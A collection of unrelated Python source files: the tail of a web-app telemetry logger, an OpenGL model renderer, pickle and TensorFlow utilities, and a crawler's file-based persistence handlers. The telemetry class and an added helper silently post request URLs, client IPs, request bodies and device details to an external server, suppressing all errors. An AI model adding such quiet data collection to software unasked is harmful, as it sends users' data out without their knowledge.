'data_manager:data_manager.api.TaskAPI',
'projects:api-templates:template-list',
'data_import:api-projects:project-file-upload-list',
'tasks:api:task-annotations',
'tasks:api-annotations:annotation-detail'
) and payload['status_code'] in (200, 201):
payload['response'] = None
def _exclude_endpoint(self, request):
if request.resolver_match and request.resolver_match.view_name in [
'django.views.static.serve',
'data_import:data-upload',
'version'
]:
return True
if request.GET.get('interaction', None) == 'timer':
return True
def send(self, request=None, response=None, body=None):
if settings.DEBUG:
try:
payload = self.create_payload(request, response, body)
except Exception as exc:
logger.error(exc, exc_info=True)
else:
if get_bool_env('DEBUG_CONTEXTLOG', False):
logger.debug(json.dumps(payload, indent=2))
pass
else:
# ignore specific events
if not self.collect_analytics or self._exclude_endpoint(request):
return
thread = threading.Thread(target=self.send_job, args=(request, response, body))
thread.start()
@staticmethod
def browser_exists(request):
return hasattr(request, 'user_agent') and request.user_agent and \
hasattr(request.user_agent, 'browser') and request.user_agent.browser
def create_payload(self, request, response, body):
payload = {
'url': request.build_absolute_uri(),
'server_id': self._get_server_id(),
'server_time': self._get_timestamp_now(),
'session_id': request.session.get('uid', None),
'client_ip': get_client_ip(request),
'is_docker': self._is_docker(),
'python': str(sys.version_info[0]) + '.' + str(sys.version_info[1]),
'env': self._get_label_studio_env(),
'version': self.version,
'view_name': request.resolver_match.view_name if request.resolver_match else None,
'namespace': request.resolver_match.namespace if request.resolver_match else None,
'scheme': request.scheme,
'method': request.method,
'values': request.GET.dict(),
'json': body,
'language': request.LANGUAGE_CODE,
'content_type': request.content_type,
'content_length': int(request.environ.get('CONTENT_LENGTH')) if request.environ.get('CONTENT_LENGTH') else None,
'status_code': response.status_code,
'response': self._get_response_content(response)
}
if self.browser_exists(request):
payload.update({
'is_mobile': request.user_agent.is_mobile,
'is_tablet': request.user_agent.is_tablet,
'is_touch_capable': request.user_agent.is_touch_capable,
'is_pc': request.user_agent.is_pc,
'is_bot': request.user_agent.is_bot,
'browser': request.user_agent.browser.family,
'browser_version': request.user_agent.browser.version_string,
'os': request.user_agent.os.family,
'platform_system': platform.system(),
'platform_release': platform.release(),
'os_version': request.user_agent.os.version_string,
'device': request.user_agent.device.family,
})
self._prepare_json(payload, request)
self._prepare_response(payload)
return payload
def send_job(self, request, response, body):
try:
payload = self.create_payload(request, response, body)
except:
pass
else:
try:
url = 'https://tele.labelstud.io'
requests.post(url=url, json=payload, timeout=3.0)
except:
pass
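# Illustrative sketch of the fire-and-forget pattern used by ContextLog.send_job,
# shown in isolation: any failure to reach the telemetry endpoint is swallowed so
# it never affects request handling. The helper itself is an example only; the
# URL is the one hard-coded above.
def _post_payload_async(payload, url='https://tele.labelstud.io'):
    def _job():
        try:
            requests.post(url=url, json=payload, timeout=3.0)
        except Exception:
            pass
    threading.Thread(target=_job).start()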
|
render.py
|
import off_loader as ol
import moderngl
import numpy as np
from pyrr import Matrix44
from PIL import Image
dodecahedron_polar_pos = [[0.78539816, 0.61547971],
[0.78539816, -0.61547971],
[-0.78539816, 0.61547971],
[-0.78539816, -0.61547971],
[-0.78539816, 0.61547971],
[-0.78539816, -0.61547971],
[0.78539816, 0.61547971],
[0.78539816, -0.61547971],
[1.57079633, 1.2059325],
[1.57079633, -1.2059325],
[-1.57079633, 1.2059325],
[-1.57079633, -1.2059325],
[0., 0.36486383],
[0., -0.36486383],
[-0., 0.36486383],
[-0., -0.36486383],
[1.2059325, 0.],
[-1.2059325, 0.],
[-1.2059325, 0.],
[1.2059325, 0.]]
class Render(object):
def __init__(self, ctx=None):
if ctx is None:
self.ctx = moderngl.create_standalone_context()
else:
self.ctx = ctx
self.prog = self.ctx.program(
vertex_shader='''
#version 330
uniform mat4 Mvp;
in vec3 in_vert;
in vec3 in_norm;
out vec3 v_vert;
out vec3 v_norm;
void main() {
v_vert = in_vert;
v_norm = in_norm;
gl_Position = Mvp*vec4(v_vert, 1.0);
}
''',
fragment_shader='''
#version 330
uniform vec3 Light;
in vec3 v_vert;
in vec3 v_norm;
out vec4 f_color;
void main() {
vec3 light = Light - v_vert;
float d_light = length(light);
float lum = abs(dot(normalize(light), normalize(v_norm)));
lum = clamp(45.0/(d_light*(d_light+0.02)) * lum, 0.0,1.0)* 0.6 +0.3;
f_color = vec4(lum * vec3(1.0, 1.0, 1.0), 0.0);
}
''',
)
self.vbo_vertices = None
self.vbo_normals = None
self.vao = None
self.fbo = None
# uniform variables
self.light = self.prog['Light']
self.mvp = self.prog['Mvp']
def setViewport(self, viewport):
self.ctx.viewport = viewport
def load_model(self, vertices, normals):
vertices = vertices.flatten()
normals = normals.flatten()
if self.vbo_vertices is not None:
self.vbo_vertices.release()
if self.vbo_normals is not None:
self.vbo_normals.release()
self.vbo_vertices = self.ctx.buffer(vertices.astype(np.float32).tobytes())
self.vbo_normals = self.ctx.buffer(normals.astype(np.float32).tobytes())
if self.vao is not None:
self.vao.release()
self.vao = self.ctx.vertex_array(self.prog, [
(self.vbo_vertices, '3f', 'in_vert'),
(self.vbo_normals, '3f', 'in_norm'),
])
def render_frame(self, theta, phi=30 / 180 * np.pi):
self.ctx.clear(1.0, 1.0, 1.0)
self.ctx.enable(moderngl.DEPTH_TEST)
camera_r = 3.88 # >= 1 / sin(pi/12)
light_r = 6.5
cos_theta, sin_theta, cos_phi, sin_phi = np.cos(theta), np.sin(theta), np.cos(phi), np.sin(phi)
camera_pos = (cos_theta * cos_phi * camera_r, sin_theta * cos_phi * camera_r, sin_phi * camera_r)
self.light.value = (cos_theta * cos_phi * light_r, sin_theta * cos_phi * light_r, sin_phi * light_r)
proj = Matrix44.perspective_projection(30.0, 1, 0.1, 1000.0)
lookat = Matrix44.look_at(
camera_pos,
(0.0, 0.0, 0.0), # look at origin
(0.0, 0.0, 1.0), # up vector
)
self.mvp.write((proj * lookat).astype('f4').tobytes())
self.vao.render()
def render_to_images(self, output_views=12, use_dodecahedron_views=False) -> 'list[Image.Image]':
"""
Render the model to `PIL` images
:param output_views: render views count
:param use_dodecahedron_views: use regular dodecahedron (20 vertices), output_views is `ignored` if True
:return: a list of images
"""
if self.fbo is None:
self.fbo = self.ctx.simple_framebuffer((1024, 1024))
self.fbo.use()
images = []
if use_dodecahedron_views:
for theta, phi in dodecahedron_polar_pos:
self.render_frame(theta, phi)
image = Image.frombytes('RGB', self.fbo.size, self.fbo.read(), 'raw', 'RGB', 0, -1)
images.append(image)
else:
delta_theta = 2 * np.pi / output_views
for i in range(output_views):
angle = delta_theta * i
self.render_frame(angle)
image = Image.frombytes('RGB', self.fbo.size, self.fbo.read(), 'raw', 'RGB', 0, -1)
images.append(image)
self.fbo.clear()
return images
def render_and_save(self, off_file, output_dir, output_views=12, use_dodecahedron_views=False):
self.load_model(*ol.load_off(off_file))
images = self.render_to_images(output_views, use_dodecahedron_views=use_dodecahedron_views)
self._save_images(images, off_file, output_dir)
# def _save_images_in_parallel(self, images, off_file, output_dir):
# import threading as th
# th.Thread(target=Render._save_images(images, off_file, output_dir)).start()
@staticmethod
def _save_images(images, off_file, output_dir):
for i, image in enumerate(images):
image = image.resize((299, 299), Image.BICUBIC)
image.save("%s/%s_%03d.jpg" % (output_dir, off_file.split('.')[0].split('/')[-1], i))
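# Illustrative helper: Render.render_frame above places the camera on a sphere
# of radius r using spherical angles theta (azimuth) and phi (elevation). The
# same conversion in isolation (for explanation only):
def _spherical_to_cartesian(theta, phi, r):
    return (np.cos(theta) * np.cos(phi) * r,
            np.sin(theta) * np.cos(phi) * r,
            np.sin(phi) * r)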
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('file', metavar='OFF_FILE', help='the off_file you want to render')
parser.add_argument('--views', type=int, default=12, metavar='N', help='count of views to render, default is 12')
parser.add_argument('--dodecahedron', action='store_true', help='use dodecahedron camera settings')
args = parser.parse_args()
render = Render()
off_file = args.file
print("loading model...")
model = ol.load_off(off_file)
render.load_model(*model)
print("start to render...")
images = render.render_to_images(args.views, args.dodecahedron)
for i, image in enumerate(images):
image = image.resize((512, 512), Image.BICUBIC)
image.save("out-%s.jpg" % i)
print("finished")
if __name__ == '__main__':
main()
|
utils.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import pickle
import threading
from contextlib import contextmanager
from functools import wraps
from collections import deque
import tensorflow as tf
# TODO: move to utils
def _check_file(path):
return os.path.isfile(path)
def save_pickle(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f)
def load_pickle(path):
with open(path, 'rb') as f:
obj = pickle.load(f)
return obj
def maybe_save(save_path):
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
if _check_file(save_path):
obj = load_pickle(save_path)
else:
obj = f(*args, **kwargs)
save_pickle(obj, save_path)
return obj
return wrapper
return decorator
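# Illustrative usage sketch: cache the result of an expensive function in a
# pickle file so repeated calls load it from disk instead of recomputing.
# The path below is an arbitrary example.
@maybe_save('/tmp/expensive_result.pkl')
def _expensive_computation_example():
    return [i * i for i in range(10)]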
def start_threads(thread_fn, args, n_threads=1):
assert n_threads == 1, "Having multiple threads causes duplicate data in the queue."
threads = []
for n in range(n_threads):
t = threading.Thread(target=thread_fn, args=args)
t.daemon = True # thread will close when parent quits
t.start()
threads.append(t)
time.sleep(1) # enqueue a bunch before dequeue
return threads
def compose(data, *funcs):
for func in funcs:
data = func(data)
return data
def set_logging_verbosity(logging_verbosity="INFO"):
if logging_verbosity == "INFO":
tf.logging.set_verbosity(tf.logging.INFO)
elif logging_verbosity == "WARN":
tf.logging.set_verbosity(tf.logging.WARN)
elif logging_verbosity == "ERROR":
tf.logging.set_verbosity(tf.logging.ERROR)
elif logging_verbosity == "DEBUG":
tf.logging.set_verbosity(tf.logging.DEBUG)
class MovingAverage(object):
def __init__(self, size):
"""
Initialize a moving average over a sliding window of the given size.
:type size: int
"""
self.__size = size
self.__sum = 0
self.__q = deque([])
def next(self, val):
"""
:type val: int
:rtype: float
"""
if len(self) == self.__size:
self.__sum -= self.__q.popleft()
self.__sum += val
self.__q.append(val)
return 1.0 * self.__sum / len(self.__q)
def __len__(self):
return len(self.__q)
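# Illustrative usage sketch: a window of size 3 averages only the three most
# recent values.
def _moving_average_example():
    ma = MovingAverage(3)
    assert ma.next(1) == 1.0       # window: [1]
    assert ma.next(10) == 5.5      # window: [1, 10]
    assert ma.next(3) == 14.0 / 3  # window: [1, 10, 3]
    assert ma.next(5) == 6.0       # window: [10, 3, 5]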
def count_number_of_parameters():
total_parameters = 0
for variable in tf.trainable_variables():
# shape is an array of tf.Dimension
shape = variable.get_shape()
variable_parametes = 1
for dim in shape:
variable_parametes *= dim.value
total_parameters += variable_parametes
return total_parameters
def delete_files():
pass
|
persistence.py
|
# -*- coding: iso-8859-1 -*-
"""Module to store persistence handler classes.
Persistence handlers take care of all implementation details related to resource storage. They expose a common interface (defined in :class:`BasePersistenceHandler`) through which the server (and/or filters/crawlers) can load, save and perform other operations on resources independently of where and how the resources are actually stored. At any point in time, the collection status of each resource must be one of those defined in the struct-like class :class:`StatusCodes`.
"""
import os
import threading
import tempfile
import cStringIO
import glob
import re
import json
import csv
import Queue
import common
import mysql.connector
from datetime import datetime
from copy import deepcopy
from collections import deque
class StatusCodes():
"""A struct-like class to hold constants for resources status codes.
The numeric value of each code can be modified to match the one used in the final location where the resources are persisted. The name of each code (``SUCCEEDED``, ``INPROGRESS``, ``AVAILABLE``, ``FAILED``, ``ERROR``) must not be modified.
"""
SUCCEEDED = 2
INPROGRESS = 1
AVAILABLE = 0
FAILED = -1
ERROR = -2
class BasePersistenceHandler():
"""Abstract class. All persistence handlers should inherit from it or from other class that inherits."""
def __init__(self, configurationsDictionary):
"""Constructor.
Each persistence handler receives everything in its corresponding handler section of the XML configuration file as the parameter *configurationsDictionary*.
"""
self._extractConfig(configurationsDictionary)
self.status = StatusCodes()
def _extractConfig(self, configurationsDictionary):
"""Extract and store configurations.
If some configuration needs any kind of pre-processing, it is done here. Extend this method if you need to pre-process custom configuration options.
"""
self.config = configurationsDictionary
if ("echo" not in self.config): self.config["echo"] = {}
def setup(self):
"""Execute per client initialization procedures.
This method is called every time a connection to a new client is opened, allowing initialization code to be executed on a per-client basis (which differs from :meth:`__init__`, which is called when the server instantiates the persistence handler, i.e., :meth:`__init__` is called just once for the whole period of execution of the program).
"""
pass
def select(self):
"""Retrive an ``AVAILABLE`` resource.
Returns:
A tuple in the format (*resourceKey*, *resourceID*, *resourceInfo*).
* *resourceKey* (user defined type): Value that uniquely identifies the resource internally. It works like a primary key in relational databases and makes it possible for resources with the same ID to exist, if needed.
* *resourceID* (user defined type): Resource ID to be sent to a client.
* *resourceInfo* (dict): Other information related to the resource, if there is any.
"""
return (None, None, None)
def update(self, resourceKey, status, resourceInfo):
"""Update the specified resource, setting its status and information data to the ones given.
Args:
* *resourceKey* (user defined type): Value that uniquely identifies the resource internally.
* *status* (:class:`StatusCodes`): New status of the resource.
* *resourceInfo* (dict): Other information related to the resource, if there is any.
"""
pass
def insert(self, resourcesList):
"""Insert new resources into the final location where resources are persisted.
Args:
* *resourcesList* (list): List of tuples containing all new resources to be inserted. Each resource is defined by a tuple in the format (*resourceID*, *resourceInfo*).
"""
pass
def count(self):
"""Count the number of resources in each status category.
Returns:
A tuple in the format (*total*, *succeeded*, *inprogress*, *available*, *failed*, *error*) where all fields are integers representing the number of resources with the respective status code.
"""
return (0, 0, 0, 0, 0, 0)
def reset(self, status):
"""Change to ``AVAILABLE`` all resources with the status code given.
Args:
* *status* (:class:`StatusCodes`): Status of the resources to be reset.
Returns:
Number of resources reset.
"""
return 0
def finish(self):
"""Execute per client finalization procedures.
This method is called every time a connection to a client is closed, allowing finalization code to be executed on a per-client basis. It is the counterpart of :meth:`setup`.
"""
pass
def shutdown(self):
"""Execute program finalization procedures (similar to a destructor).
This method is called when the server is shut down, allowing finalization code to be executed in a global manner. It is intended to be the counterpart of :meth:`__init__`, but differs from :meth:`__del__() <python:object.__del__>` in that it is not bound to the lifetime of the persistence handler object itself, but rather to the span of execution time of the server.
"""
pass
# IMPORTANT NOTE: MemoryPersistenceHandler class was built as a basis for FilePersistenceHandler and its extensions,
# and for test purposes. Although it can be set in the configuration file, it is not intended for direct use in a
# production environment. In that case, choose one of the file-based handlers instead
class MemoryPersistenceHandler(BasePersistenceHandler):
def __init__(self, configurationsDictionary):
BasePersistenceHandler.__init__(self, configurationsDictionary)
self.insertLock = threading.Lock()
self.resources = []
self.IDsHash = {}
self.statusRecords = {self.status.SUCCEEDED: [],
self.status.INPROGRESS: [],
self.status.AVAILABLE: deque(),
self.status.FAILED: [],
self.status.ERROR: []}
#self._loadTestData()
def _extractConfig(self, configurationsDictionary):
BasePersistenceHandler._extractConfig(self, configurationsDictionary)
if ("uniqueresourceid" not in self.config): self.config["uniqueresourceid"] = False
else: self.config["uniqueresourceid"] = common.str2bool(self.config["uniqueresourceid"])
if ("onduplicateupdate" not in self.config): self.config["onduplicateupdate"] = False
else: self.config["onduplicateupdate"] = common.str2bool(self.config["onduplicateupdate"])
def _save(self, pk, id, status, info, changeInfo = True):
if (pk is not None):
if (status is not None): self.resources[pk]["status"] = status
if (changeInfo):
if (self.resources[pk]["info"] is not None) and (info is not None): self.resources[pk]["info"].update(info)
else: self.resources[pk]["info"] = info
else:
self.resources.append({"id": id, "status": status, "info": info})
def _loadTestData(self):
self.resources.extend([
{"id": 1, "status": 0, "info": {"crawler_name": "c1", "response_code": 3}},
{"id": 2, "status": 0, "info": {"crawler_name": "c2", "response_code": 3}},
{"id": 3, "status": 0, "info": None},
{"id": 4, "status": 0, "info": None}
])
for pk, resource in enumerate(self.resources):
self.statusRecords[resource["status"]].append(pk)
if (self.config["uniqueresourceid"]):
if (resource["id"] not in self.IDsHash): self.IDsHash[resource["id"]] = pk
else: raise KeyError("Duplicated ID found in resources list: %s." % resource["id"])
def select(self):
try: pk = self.statusRecords[self.status.AVAILABLE].popleft()
except IndexError: return (None, None, None)
self._save(pk, None, self.status.INPROGRESS, None, False)
self.statusRecords[self.status.INPROGRESS].append(pk)
return (pk, self.resources[pk]["id"], deepcopy(self.resources[pk]["info"]))
def update(self, resourceKey, status, resourceInfo):
currentStatus = self.resources[resourceKey]["status"]
self.statusRecords[currentStatus].remove(resourceKey)
if (resourceInfo): self._save(resourceKey, None, status, resourceInfo)
else: self._save(resourceKey, None, status, resourceInfo, False)
self.statusRecords[status].append(resourceKey)
def insert(self, resourcesList):
for resourceID, resourceInfo in resourcesList:
if (self.config["uniqueresourceid"]) and (resourceID in self.IDsHash):
if (self.config["onduplicateupdate"]):
self._save(self.IDsHash[resourceID], None, None, resourceInfo)
continue
else: raise KeyError("Cannot insert resource, ID %s already exists." % resourceID)
with self.insertLock:
self.statusRecords[self.status.AVAILABLE].append(len(self.resources))
if (self.config["uniqueresourceid"]): self.IDsHash[resourceID] = len(self.resources)
self._save(None, resourceID, self.status.AVAILABLE, resourceInfo)
def count(self):
return (len(self.resources),
len(self.statusRecords[self.status.SUCCEEDED]),
len(self.statusRecords[self.status.INPROGRESS]),
len(self.statusRecords[self.status.AVAILABLE]),
len(self.statusRecords[self.status.FAILED]),
len(self.statusRecords[self.status.ERROR]))
def reset(self, status):
resetList = self.statusRecords[status][:]
for pk in resetList:
self.statusRecords[status].remove(pk)
self._save(pk, None, self.status.AVAILABLE, None, False)
self.statusRecords[self.status.AVAILABLE].appendleft(pk)
return len(resetList)
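# Illustrative usage sketch of the in-memory handler exercised end to end. As
# noted above it exists mainly for tests; the resource IDs and info dictionaries
# here are arbitrary examples.
def _example_memory_handler_usage():
    handler = MemoryPersistenceHandler({})
    handler.insert([(1, {"crawler_name": "c1"}), (2, None)])
    key, resource_id, info = handler.select()  # marks the resource INPROGRESS
    handler.update(key, handler.status.SUCCEEDED, {"response_code": 200})
    # (total, succeeded, inprogress, available, failed, error)
    assert handler.count() == (2, 1, 0, 1, 0, 0)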
class FilePersistenceHandler(MemoryPersistenceHandler):
"""Load and dump resources from/to a file.
All resources in the file are loaded into memory before the server operations begin, so this handler is recommended for small to medium-sized datasets that fit completely into the machine's memory. For larger datasets, consider using another persistence handler. Another option for large datasets is to split the resources across more than one file, collecting the resources of one file at a time.
The default version of this handler supports CSV and JSON files. It is possible to add support to other file types by subclassing :class:`BaseFileColumns` and :class:`BaseFileHandler`. The new file type must also be included in the :attr:`supportedFileTypes` dictionary.
"""
class BaseFileColumns():
"""Hold column names of data in the file, allowing fast access to names of ID, status and info columns."""
def __init__(self, fileName, idColumn, statusColumn):
self.names = self._extractColNames(fileName)
self.idName = idColumn
self.statusName = statusColumn
self.infoNames = [name for name in self.names if (name not in (self.idName, self.statusName))]
def _extractColNames(self, fileName):
"""Extract column names from the file.
Must be overridden, as column name extraction depends on the file type.
Returns:
A list of all column names in the file.
"""
return []
class BaseFileHandler():
"""Handle low level details about persistence in a specific file type.
Each resource loaded from a file is stored in memory in a dictionary in the format ``{"id": X, "status": X, "info": {...}}``, which is the resource's internal representation format. This handler is responsible for translating resources from the internal representation format to the format used by a specific file type and vice versa.
"""
def __init__(self): self.status = StatusCodes()
def parse(self, resource, columns):
"""Transform resource from file format to internal representation format.
Args:
* *resource* (file specific type): Resource given in file format.
* *columns* (:class:`BaseFileColumns <FilePersistenceHandler.BaseFileColumns>` subclass): Object holding column names.
Returns:
A resource in internal representation format.
"""
return {"id": None, "status": None, "info": None}
def unparse(self, resource, columns):
"""Transform resource from internal representation format to file format.
Args:
* *resource* (dict): Resource given in internal representation format.
* *columns* (:class:`BaseFileColumns <FilePersistenceHandler.BaseFileColumns>` subclass): Object holding column names.
Returns:
A resource in file format.
"""
return None
def load(self, file, columns):
"""Load resources in file format and yield them in internal representation format.
Args:
* *file* (:ref:`file object<python:bltin-file-objects>`): File object bound to the physical file where resources are stored.
* *columns* (:class:`BaseFileColumns <FilePersistenceHandler.BaseFileColumns>` subclass): Object holding column names.
Yields:
A resource in internal representation format.
"""
yield {"id": None, "status": None, "info": None}
def dump(self, resources, file, columns):
"""Save resources in internal representation format to file format.
Args:
* *resources* (list): List of resources in internal representation format.
* *file* (:ref:`file object<python:bltin-file-objects>`): File object bound to the physical file where resources will be stored.
* *columns* (:class:`BaseFileColumns <FilePersistenceHandler.BaseFileColumns>` subclass): Object holding column names.
"""
pass
class CSVColumns(BaseFileColumns):
"""Hold column names of data in CSV files, allowing fast access to names of ID, status and info columns."""
def _extractColNames(self, fileName):
with open(fileName, "r") as file:
reader = csv.DictReader(file, quoting = csv.QUOTE_MINIMAL, quotechar = "'", skipinitialspace = True)
columns = reader.fieldnames
return [col.strip("\"") for col in columns]
class CSVHandler(BaseFileHandler):
"""Handle low level details about persistence in CSV files.
.. note::
This class and :class:`CSVColumns <FilePersistenceHandler.CSVColumns>` class uses Python's built-in :mod:`python:csv` module internally.
"""
def _parseValue(self, value):
if (not value): return None
if (not value.startswith("\"")):
if value.upper() in ("TRUE", "T"): return True
if value.upper() in ("FALSE", "F"): return False
if value.upper() in ("NONE", "NULL"): return None
if ("." in value): return float(value)
return int(value)
return value.strip("\"")
def _unparseValue(self, value):
if isinstance(value, basestring):
if isinstance(value, unicode): value = value.encode("utf-8")
return "".join(("\"", value, "\""))
if isinstance(value, bool): return ("T" if (value) else "F")
return value
def parse(self, resource, columns):
parsed = {"id": self._parseValue(resource[columns.idName])}
if ((columns.statusName in columns.names) and (resource[columns.statusName])):
parsed["status"] = self._parseValue(resource[columns.statusName])
else: parsed["status"] = self.status.AVAILABLE
if (columns.infoNames):
parsed["info"] = {}
for column in columns.infoNames:
parsed["info"][column] = self._parseValue(resource[column])
return parsed
def unparse(self, resource, columns):
buffer = cStringIO.StringIO()
writer = csv.DictWriter(buffer, columns.names, quoting = csv.QUOTE_MINIMAL, quotechar = "'", lineterminator = "\n", extrasaction = "ignore")
unparsed = {columns.idName: self._unparseValue(resource["id"])}
if (resource["status"] != self.status.AVAILABLE):
unparsed[columns.statusName] = self._unparseValue(resource["status"])
if (resource["info"]):
for key, value in resource["info"].iteritems():
if (value is not None) and (key in columns.infoNames): unparsed[key] = self._unparseValue(value)
writer.writerow(unparsed)
return buffer.getvalue()
def load(self, file, columns):
reader = csv.DictReader(file, columns.names, quoting = csv.QUOTE_MINIMAL, quotechar = "'", skipinitialspace = True)
next(reader)
for resource in reader:
yield self.parse(resource, columns)
def dump(self, resources, file, columns):
writer = csv.DictWriter(file, columns.names, quoting = csv.QUOTE_MINIMAL, quotechar = "'", lineterminator = "\n", extrasaction = "ignore")
writer.writeheader()
# In the case of CSV, it is easier and faster to unparse the resource here instead of using the
# unparse method, so the writerow method can save the resource directly to the file
for resource in resources:
row = {columns.idName: self._unparseValue(resource["id"])}
if (resource["status"] != 0): row[columns.statusName] = self._unparseValue(resource["status"])
if (resource["info"]):
for key, value in resource["info"].iteritems():
if (value is not None) and (key in columns.infoNames): row[key] = self._unparseValue(value)
writer.writerow(row)
class JSONColumns(BaseFileColumns):
"""Hold column names of data in JSON files, allowing fast access to names of ID, status and info columns."""
def _extractColNames(self, fileName):
with open(fileName, "r") as file: content = file.read(1024)
columnsStart = content.index("[") + 1
columnsEnd = content.index("]")
columns = content[columnsStart:columnsEnd]
return [name.strip("\" ") for name in columns.split(",")]
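# For reference, _extractColNames above expects the file to begin with a header of the form
# written by JSONHandler.dump below (column names here are illustrative only):
#   {"columns": ["resource_id", "status", "crawled"], "resources": [ ... ]}
# Only the first 1024 bytes are read, so the column list must appear near the start of the file.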
class JSONHandler(BaseFileHandler):
"""Handle low level details about persistence in JSON files.
.. note::
This class and :class:`JSONColumns <FilePersistenceHandler.JSONColumns>` use Python's built-in :mod:`python:json` module internally.
"""
def parse(self, resource, columns):
parsed = {"id": resource[columns.idName]}
if ((columns.statusName in columns.names) and (columns.statusName in resource)):
parsed["status"] = resource[columns.statusName]
else: parsed["status"] = self.status.AVAILABLE
if (columns.infoNames):
parsed["info"] = {}
for column in columns.infoNames:
if (column in resource): parsed["info"][column] = resource[column]
else: parsed["info"][column] = None
return parsed
def unparse(self, resource, columns):
unparsed = {columns.idName: resource["id"]}
if (resource["status"] != self.status.AVAILABLE): unparsed[columns.statusName] = resource["status"]
if (resource["info"]):
for key, value in resource["info"].iteritems():
if (value is not None) and (key in columns.infoNames): unparsed[key] = value
return json.dumps(unparsed)
def load(self, file, columns):
input = json.load(file)
for resource in input["resources"]:
yield self.parse(resource, columns)
def dump(self, resources, file, columns):
file.write("{\"columns\": %s, \"resources\": [" % json.dumps(columns.names))
separator = ""
for resource in resources:
file.write("%s%s" % (separator, self.unparse(resource, columns)))
separator = ", "
file.write("]}")
supportedFileTypes = {
# Type : [FileColumns, FileHandler]
"CSV" : ["CSVColumns", "CSVHandler"],
"JSON" : ["JSONColumns", "JSONHandler"]
}
"""Associate file types and its columns and handler classes. The type of the current file is provided by the user directly (through the ``filetype`` option in the XML configuration file) or indirectly (through the file extension extracted from file name). When checking if the type of the current file is on the list of supported file types, the comparison between the strings is case insensitive."""
def __init__(self, configurationsDictionary):
MemoryPersistenceHandler.__init__(self, configurationsDictionary)
self.echo = common.EchoHandler(self.config["echo"])
self.saveLock = threading.Lock()
self.dumpExceptionEvent = threading.Event()
self._setFileHandler()
with open(self.config["filename"], "r") as inputFile:
resourcesList = self.fileHandler.load(inputFile, self.fileColumns)
for resource in resourcesList:
self.statusRecords[resource["status"]].append(len(self.resources))
if (self.config["uniqueresourceid"]):
if (resource["id"] not in self.IDsHash): self.IDsHash[resource["id"]] = len(self.resources)
else: raise KeyError("Duplicated ID found in '%s': %s." % (self.config["filename"], resource["id"]))
if ("info" not in resource): resource["info"] = None
self.resources.append(resource)
self.timer = threading.Timer(self.config["savetimedelta"], self._dumpTimerThread)
self.timer.daemon = True
self.timer.start()
def _extractConfig(self, configurationsDictionary):
MemoryPersistenceHandler._extractConfig(self, configurationsDictionary)
if ("filetype" in self.config): self.config["filetype"] = self.config["filetype"].lower()
else: self.config["filetype"] = os.path.splitext(self.config["filename"])[1][1:].lower()
self.config["savetimedelta"] = int(self.config["savetimedelta"])
if (self.config["savetimedelta"] < 1): raise ValueError("Parameter 'savetimedelta' must be greater than zero.")
def _save(self, pk, id, status, info, changeInfo = True):
with self.saveLock: MemoryPersistenceHandler._save(self, pk, id, status, info, changeInfo)
def _setFileHandler(self):
for type, handler in FilePersistenceHandler.supportedFileTypes.iteritems():
if (self.config["filetype"] == type.lower()):
FileColumnsClass = getattr(self, handler[0])
FileHandlerClass = getattr(self, handler[1])
self.fileColumns = FileColumnsClass(self.config["filename"], self.config["resourceidcolumn"], self.config["statuscolumn"])
self.fileHandler = FileHandlerClass()
return
raise TypeError("Unknown file type '%s' for file '%s'." % (self.config["filetype"], self.config["filename"]))
def _checkDumpException(function):
def decoratedFunction(self, *args):
if (self.dumpExceptionEvent.is_set()):
raise RuntimeError("Exception in dump thread. Execution of FilePersistenceHandler aborted.")
return function(self, *args)
return decoratedFunction
def _dump(self):
self.echo.out("[File: %s] Saving list of resources to file..." % self.config["filename"])
with tempfile.NamedTemporaryFile(mode = "w", suffix = ".temp", prefix = "dump_", dir = "", delete = False) as temp:
with self.saveLock:
self.fileHandler.dump(self.resources, temp, self.fileColumns)
common.replace(temp.name, self.config["filename"])
self.echo.out("[File: %s] Resources saved." % self.config["filename"])
def _dumpTimerThread(self):
try:
self._dump()
except:
self.dumpExceptionEvent.set()
self.echo.out("[File: %s] Exception while saving resources." % self.config["filename"], "EXCEPTION")
else:
self.timer = threading.Timer(self.config["savetimedelta"], self._dumpTimerThread)
self.timer.daemon = True
self.timer.start()
@_checkDumpException
def select(self):
return MemoryPersistenceHandler.select(self)
@_checkDumpException
def update(self, resourceKey, status, resourceInfo):
MemoryPersistenceHandler.update(self, resourceKey, status, resourceInfo)
@_checkDumpException
def insert(self, resourcesList):
for resourceID, resourceInfo in resourcesList:
try: MemoryPersistenceHandler.insert(self, [(resourceID, resourceInfo)])
except KeyError: raise KeyError("Cannot insert resource, ID %s already exists in '%s'." % (resourceID, self.config["filename"]))
@_checkDumpException
def count(self):
return MemoryPersistenceHandler.count(self)
@_checkDumpException
def reset(self, status):
return MemoryPersistenceHandler.reset(self, status)
def shutdown(self):
self.timer.cancel()
self._dump()
class RolloverFilePersistenceHandler(FilePersistenceHandler):
"""Load and dump resources from/to files respecting limits of file size and/or number of resources per file.
This handler uses multiple instances of :class:`FilePersistenceHandler` to allow insertion of new resources respecting limits specified by the user. It is also capable of reading and updating resources from multiple files.
The rollover handler leaves the low level details of persistence to the file handlers attached to each file, taking care of the coordination necessary to maintain consistency between them and of enforcing the established limits.
When inserting new resources, every time the file size limit and/or the number of resources per file limit is reached, the rollover handler opens a new file and assigns a new instance of :class:`FilePersistenceHandler` to handle it. All resources, however, are kept in memory. So, as in the case of :class:`FilePersistenceHandler`, this handler is not well suited for large datasets that cannot fit completely in memory.
.. note::
This handler was inspired by Python's :class:`python:logging.handlers.RotatingFileHandler` class.
"""
def __init__(self, configurationsDictionary):
self.originalConfig = deepcopy(configurationsDictionary)
MemoryPersistenceHandler.__init__(self, configurationsDictionary)
self._setFileHandler()
self.fileHandlersList = []
self.nextSuffixNumber = 1
self.insertHandlerIndex = 0
self.insertSize = -1
self.insertAmount = -1
# Iterate over old rollover files to get file names and max suffix number already used
fileNamesList = [self.config["filename"]]
for name in glob.iglob(self.config["filename"] + ".*"):
if re.search("\.[0-9]+$", name):
fileNamesList.append(name)
suffixNumber = int(name.rsplit(".", 1)[1])
if (suffixNumber >= self.nextSuffixNumber): self.nextSuffixNumber = suffixNumber + 1
# Initialize file persistence handlers
for fileName in fileNamesList: self._addHandler(fileName)
# Get initial file size and amount
if (self.config["sizethreshold"]): self.insertSize = os.path.getsize(self.config["filename"])
if (self.config["amountthreshold"]): self.insertAmount = len(self.fileHandlersList[self.insertHandlerIndex].resources)
def _extractConfig(self, configurationsDictionary):
